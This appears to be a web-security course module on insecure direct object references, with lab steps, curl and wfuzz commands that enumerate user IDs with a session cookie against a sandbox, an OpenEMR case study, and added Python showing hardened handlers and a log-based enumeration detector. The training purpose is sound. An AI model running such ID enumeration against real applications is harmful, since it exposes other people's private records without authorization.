Module 15: Insecure Direct Object Referencing

Introduction to IDOR

Static File IDOR

Static File IDOR Landing Page

Sample routing

/users/:userIdent/documents/:pdfFile
/trains/:from-:to
/book/:year-:author

Routed URI Examples

/users/18293017/documents/file-15 (PDF Retrieved)
/trains/LVIV-ODESSA               (Ticket File Retrieved)
/book/1996-GeorgeRRMartin         (Book Retrieved)

Database Object Referencing (ID-Based) IDOR

Example IDOR for a Database Object

http://idor-sandbox:80/customerPage/?custId=1

Exploiting IDOR in the Sandbox

Accessing the IDOR Sandbox Application

Start the VPN, the VM, and add its IP and hostname to your hosts file.

Exploiting Static File IDOR

Click "File-Based IDOR"
File-Based IDOR URI
Contents of the file
Setting ?f=2.txt

Exploiting ID-Based IDOR

ID-Based IDOR
The /customerPage/?custId= URI
The Rendered Content
Incrementing the custId Database Parameter by one

Because the browser returned a completely different user's record when the Customer ID value was changed to "2", we can infer that this was the second user registered with the web application.
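The routes on this page (/users/:userIdent/documents/:pdfFile, the file-based ?f=2.txt page and /customerPage/?custId=N) all share one defect: the server takes the object identifier from the request and never asks whether the logged-in user is allowed to see that object. The block below is an added example, not code from the course or the sandbox application, showing each vulnerable lookup beside a hardened version in plain Python (no web framework, so it runs offline). The data store, user IDs, customer rows, file names and the Session class are all constructed for the example.

```python
import secrets
from dataclasses import dataclass, field

# Constructed sample data standing in for the sandbox's document store, customer
# table and per-user text files (hypothetical values, not taken from the lab).
DOCUMENTS = {
    ("18293017", "file-15"): b"%PDF- contract of user 18293017",
    ("18293018", "file-1"): b"%PDF- payslip of user 18293018",
}
CUSTOMERS = {
    1: {"name": "Alice", "email": "alice@example.test"},
    2: {"name": "Bob", "email": "bob@example.test"},
}
USER_FILES = {  # which ?f=<name> files each user is allowed to read
    "18293017": {"1.txt": b"alice's notes"},
    "18293018": {"2.txt": b"bob's notes"},
}
NOT_FOUND = (404, b"Not found")
LOGIN_REQUIRED = (401, b"Login required")


@dataclass
class Session:
    """Server-side session: identity is fixed at login, never taken from the URL."""
    user_id: str
    customer_id: int
    is_staff: bool = False
    file_refs: dict = field(default_factory=dict)  # opaque token -> file name


# --- vulnerable handlers: the identifier in the request decides what comes back ---

def user_document_insecure(session, user_ident, pdf_file):
    """GET /users/:userIdent/documents/:pdfFile with no ownership check."""
    doc = DOCUMENTS.get((user_ident, pdf_file))
    return (200, doc) if doc else NOT_FOUND


def customer_page_insecure(session, cust_id):
    """GET /customerPage/?custId=N: any logged-in user can walk custId=1, 2, 3..."""
    row = CUSTOMERS.get(cust_id)
    return (200, row) if row else NOT_FOUND


# --- hardened handlers: the session decides, the identifier is only a lookup key ---

def user_document_secure(session, user_ident, pdf_file):
    if session is None:
        return LOGIN_REQUIRED
    if user_ident != session.user_id and not session.is_staff:
        # Same answer as a missing file, so the ID cannot be used as an existence oracle.
        return NOT_FOUND
    doc = DOCUMENTS.get((user_ident, pdf_file))
    return (200, doc) if doc else NOT_FOUND


def customer_page_secure(session, cust_id=None):
    if session is None:
        return LOGIN_REQUIRED
    # Simplest fix: ignore the client-supplied ID and use the one bound to the session.
    # Only staff accounts may look up somebody else's record.
    if cust_id is None or not session.is_staff:
        cust_id = session.customer_id
    row = CUSTOMERS.get(cust_id)
    return (200, row) if row else NOT_FOUND


# --- indirect object references for the ?f=<name> pattern ---

def issue_file_refs(session):
    """Replace direct file names with per-session random tokens; returns the tokens."""
    session.file_refs = {secrets.token_urlsafe(16): name
                         for name in USER_FILES.get(session.user_id, {})}
    return list(session.file_refs)


def file_by_ref(session, token):
    """GET /files/?f=<token>: only tokens issued to this session resolve to a file."""
    if session is None:
        return LOGIN_REQUIRED
    name = session.file_refs.get(token)
    if name is None:
        return NOT_FOUND
    return (200, USER_FILES[session.user_id][name])
```

The two design points worth copying are that an unauthorized object and a non-existent object return the same response (otherwise the status code or body size becomes an enumeration oracle, which is exactly what the fuzzing later in this module relies on), and that for the file case the client never sees a real file name at all, only a token that is meaningless outside the session that issued it.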

Exploiting More Complex IDOR

Logging in as User Harb
Harb's Data

Gathering Erroneous Response Sizes

kali@kali:~$ curl -s http://idor-sandbox:80/user/?uid=62718 -w '%{size_download}'
0

We got 0 because we didn't include a valid session ID.

Gathering a valid session ID

Gathering Erroneous Response Sizes with a Session ID

kali@kali:~$ curl -s -o /dev/null http://idor-sandbox:80/user/?uid=91191 -w '%{size_download}' --header "Cookie: PHPSESSID=2a19139a5af3b1e99dd277cfee87bd64"
2873

Fuzzing 100,000 possible UIDs

kali@kali:~$ wfuzz -c -z file,/usr/share/seclists/Fuzzing/5-digits-00000-99999.txt --hc 404 --hh 2873 -H "Cookie: PHPSESSID=2a19139a5af3b1e99dd277cfee87bd64" http://idor-sandbox:80/user/?uid=FUZZ

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://idor-sandbox:80/user/?uid=FUZZ
Total requests: 100000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000011112:   200        76 L     174 W      2859 Ch     "11111"
000016328:   200        76 L     174 W      2860 Ch     "16327"
000023102:   200        76 L     174 W      2874 Ch     "23101"
000039202:   200        76 L     174 W      2867 Ch     "39201"
000041913:   200        76 L     174 W      2861 Ch     "41912"
000057192:   200        76 L     174 W      2863 Ch     "57191"
000062719:   200        76 L     174 W      2871 Ch     "62718"
000074833:   200        76 L     175 W      2868 Ch     "74832"
000083272:   200        76 L     174 W      2858 Ch     "83271"
000099181:   200        76 L     174 W      2866 Ch     "99180"

Total time: 755.6711
Processed Requests: 100000
Filtered Requests: 99990
Requests/sec.: 132.3327

Exfiltrated Data
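The wfuzz run above works by hiding the baseline "no such record" response size (--hh 2873) so that the handful of valid UIDs stand out. The same activity is just as visible from the other side: the access log shows one client requesting thousands of consecutive uid values and receiving the same-sized page almost every time. The block below is an added example, not part of the course material, that parses constructed Apache-style access-log lines (hypothetical IPs, timestamps and IDs) and flags client/parameter pairs that look like identifier enumeration; the parameter names uid, custId and f are the ones used on this page.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache combined format). 10.0.0.5 walks
# consecutive uid values and mostly gets the 2873-byte "unknown user" page;
# 10.0.0.9 is ordinary browsing.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /user/?uid=62718 HTTP/1.1" 200 2871 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2024:10:00:02 +0000] "GET /user/?uid=62719 HTTP/1.1" 200 2873 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2024:10:00:02 +0000] "GET /user/?uid=62720 HTTP/1.1" 200 2873 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2024:10:00:03 +0000] "GET /user/?uid=62721 HTTP/1.1" 200 2873 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2024:10:00:03 +0000] "GET /user/?uid=62722 HTTP/1.1" 200 2873 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2024:10:00:04 +0000] "GET /user/?uid=62723 HTTP/1.1" 200 2873 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:00:05 +0000] "GET /user/?uid=11111 HTTP/1.1" 200 2859 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:05:00 +0000] "GET /customerPage/?custId=1 HTTP/1.1" 200 1204 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:05:30 +0000] "GET /customerPage/?custId=2 HTTP/1.1" 200 1198 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# Query parameters that carry a direct object reference in this application.
ID_PARAMS = ("uid", "custId", "f")


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = None if rec["size"] == "-" else int(rec["size"])
    return rec


def object_requests(lines):
    """Yield (ip, param, value, status, size) for every ID-bearing request."""
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        query = parse_qs(urlsplit(rec["target"]).query)
        for param in ID_PARAMS:
            for value in query.get(param, []):
                yield rec["ip"], param, value, rec["status"], rec["size"]


def find_enumeration(lines, min_distinct=5):
    """Flag clients that request at least min_distinct different IDs for one parameter.

    Returns {(ip, param): summary}. A run of consecutive integers and a dominant
    response size (the page wfuzz's --hh would filter out) are reported as evidence.
    """
    seen = defaultdict(list)
    for ip, param, value, status, size in object_requests(lines):
        seen[(ip, param)].append((value, status, size))
    alerts = {}
    for key, hits in seen.items():
        values = [v for v, _, _ in hits]
        distinct = len(set(values))
        if distinct < min_distinct:
            continue
        ints = [int(v) for v in values if v.isdigit()]
        sequential = sum(1 for a, b in zip(ints, ints[1:]) if abs(b - a) == 1)
        size_counts = Counter(s for _, _, s in hits if s is not None)
        baseline_size, baseline_hits = size_counts.most_common(1)[0] if size_counts else (None, 0)
        alerts[key] = {
            "distinct_ids": distinct,
            "sequential_steps": sequential,
            "baseline_size": baseline_size,
            "baseline_hits": baseline_hits,
            "not_found": sum(1 for _, st, _ in hits if st == 404),
        }
    return alerts


if __name__ == "__main__":
    for (ip, param), summary in find_enumeration(SAMPLE_LOG.splitlines()).items():
        print(f"{ip} enumerating {param}: {summary}")
```

A production version would key on the session cookie as well as the source address and evaluate over a sliding time window, since the wfuzz run above sent its 100,000 requests in under 13 minutes from a single session; the threshold of five distinct IDs is deliberately low for the sample data.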

Extra Miles

Do the labs.

Case Study: OpenEMR

Accessing The OpenEMR Case Study

Start the VPN, the VM, and add the IP/hostname to your hosts file.

Discovery of the IDOR Vulnerability

OpenEMR Landing Page
Login form
Dashboard Panel for OpenEMR
Message Center - Tab
Message Center - Tab Content
Individual Patient Messages
Turning on Burp Suite's Intercept Feature
Clicking Print message
Intercepted Request in Burp Suite
Request in Repeater

Exploiting the IDOR Vulnerability

Exfiltrated Data for Parameter Value of 11
Trying again with a value of 10

Extra Mile

Do the lab.
